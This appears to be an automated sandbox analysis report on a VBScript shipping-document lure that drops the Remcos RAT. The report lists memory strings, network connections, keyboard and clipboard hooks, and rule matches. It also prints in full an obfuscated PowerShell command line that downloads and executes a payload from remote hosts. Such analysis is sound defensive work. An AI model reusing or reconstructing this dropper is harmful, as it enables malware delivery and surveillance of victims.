Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/N
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Ne
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Ned
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Neds
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedsl
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedsla
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslag
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagn
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagni
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnin
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagning
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.d
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dw
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwp
Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379A562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwpX
Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-09-10-14/PreSignInSettingsConfig.json
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=eafda5
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wab.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60918
Source: unknown	Network traffic detected: HTTP traffic on port 60918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

19_2_0041183A

Contains functionality to modify clipboard data

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	19_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	19_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	21_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	21_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	22_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	22_2_004072B5

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7792.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Elevarbejder.ShellExecute("P" & Anyone, Ergometercykelen, "", "", Aalegaard)

Sample has a suspicious name (potential lure to open the executable)

Source: DHL Shipping Document Awb & BL.vbs

Static file information: Suspicious name

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4250
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4250	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4250	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe			Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04586E09 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	10_2_04586E09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	19_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00401806 NtdllDefWindowProc_W,	19_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004018C0 NtdllDefWindowProc_W,	19_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004016FD NtdllDefWindowProc_A,	21_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004017B7 NtdllDefWindowProc_A,	21_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00402CAC NtdllDefWindowProc_A,	22_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00402D66 NtdllDefWindowProc_A,	22_2_00402D66

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886EEB506	2_2_00007FF886EEB506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886EEC2B2	2_2_00007FF886EEC2B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0481F1F0	5_2_0481F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0481FAC0	5_2_0481FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0481EEA8	5_2_0481EEA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B37194	10_2_22B37194
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B2B5C1	10_2_22B2B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044B040	19_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0043610D	19_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00447310	19_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044A490	19_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040755A	19_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0043C560	19_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044B610	19_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044D6C0	19_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004476F0	19_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044B870	19_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044081D	19_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00414957	19_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004079EE	19_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00407AEB	19_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044AA80	19_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00412AA9	19_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00404B74	19_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00404B03	19_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044BBD8	19_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00404BE5	19_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00404C76	19_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00415CFE	19_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00416D72	19_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00446D30	19_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00446D8B	19_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00406E8F	19_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00405038	21_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0041208C	21_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004050A9	21_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0040511A	21_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0043C13A	21_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004051AB	21_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00449300	21_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0040D322	21_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044A4F0	21_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0043A5AB	21_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00413631	21_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00446690	21_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044A730	21_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004398D8	21_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_004498E0	21_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044A886	21_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0043DA09	21_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00438D5E	21_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00449ED0	21_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0041FE83	21_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00430F54	21_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004050C2	22_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004014AB	22_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00405133	22_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004051A4	22_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00401246	22_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_0040CA46	22_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00405235	22_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004032C8	22_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00401689	22_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00402F60	22_2_00402F60

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00416760 appears 69 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: DHL Shipping Document Awb & BL.vbs

